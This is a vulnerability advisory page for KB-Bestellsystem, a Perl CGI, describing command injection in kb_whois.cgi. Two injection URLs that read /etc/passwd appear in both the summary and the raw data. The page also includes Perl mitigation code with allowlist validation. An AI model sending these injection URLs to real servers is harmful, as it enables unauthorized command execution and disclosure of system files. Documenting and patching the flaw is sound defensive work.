vendor: KB-Bestellsystem
by: milw0rm.com
CVSS: 7.5 (HIGH)
Shell Metacharacter Filtering Bypass
CWE: 78
Product Name: KB-Bestellsystem
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

KB-Bestellsystem Perl Domain Order System Shell Metacharacter Filtering Bypass

"KB-Bestellsystem" is a domain order system written in Perl. The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters. The following examples will show you the /etc/passwd file:

http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=

<< Greetz Zero X >>

Mitigation:

Implement proper input validation and filtering on the "domain" and "tld" parameters in "kb_whois.cgi" so that shell metacharacters in them cannot reach the shell.
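One way to implement this mitigation in Perl, as an added example that is not KB-Bestellsystem's own code: allowlist validation of both parameters, plus a lookup that bypasses the shell entirely. It assumes the script passes the two values to a whois client; the sub names `valid_domain`, `valid_tld` and `whois_lookup` are hypothetical, and the test inputs are constructed from the values shown on this page.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Allowlist for one DNS label: letters, digits, inner hyphens, 1-63 chars.
# \A and \z anchor the whole string; "$" would let a trailing newline through.
sub valid_domain {
    my ($d) = @_;
    return (defined($d)
        && $d =~ /\A[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\z/) ? 1 : 0;
}

# TLD in the form the page shows (".com"): a leading dot, then 2-24 letters.
sub valid_tld {
    my ($t) = @_;
    return (defined($t) && $t =~ /\A\.[A-Za-z]{2,24}\z/) ? 1 : 0;
}

# Hypothetical lookup helper (assumption: the CGI runs a whois client).
# Validation is the first layer; list-form open is the second: the arguments
# are handed to exec directly, so no /bin/sh ever parses ";" or "|".
sub whois_lookup {
    my ($domain, $tld) = @_;
    return unless valid_domain($domain) && valid_tld($tld);
    open(my $fh, '-|', 'whois', "$domain$tld") or return;
    my $out = do { local $/; <$fh> };
    close $fh;
    return $out;
}

# Constructed inputs: one benign pair, the two decoded values from this
# advisory, and a trailing-newline case that a "$"-anchored regex would miss.
my @cases = (
    [ 'google',            '.com'                  ],
    [ ';cat /etc/passwd;', '.com'                  ],
    [ 'google',            '.com;cat /etc/passwd;' ],
    [ "google\n",          '.com'                  ],
);
for my $c (@cases) {
    my ($d, $t) = @$c;
    my $ok = valid_domain($d) && valid_tld($t);
    (my $shown = "$d$t") =~ s/\n/\\n/g;    # make the newline visible
    printf "%-8s %s\n", ($ok ? 'accept' : 'reject'), $shown;
}
```

The demo loop only exercises the validators, so it runs offline; `whois_lookup` is defined to show where the list-form `open` replaces a shell-interpolated command.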
Source

Exploit-DB raw data:

"KB-Bestellsystem" is a domain order system written in Perl.
The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters.

The following examples will show you the /etc/passwd file:

http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=

<< Greetz Zero X >>

# milw0rm.com [2007-11-22]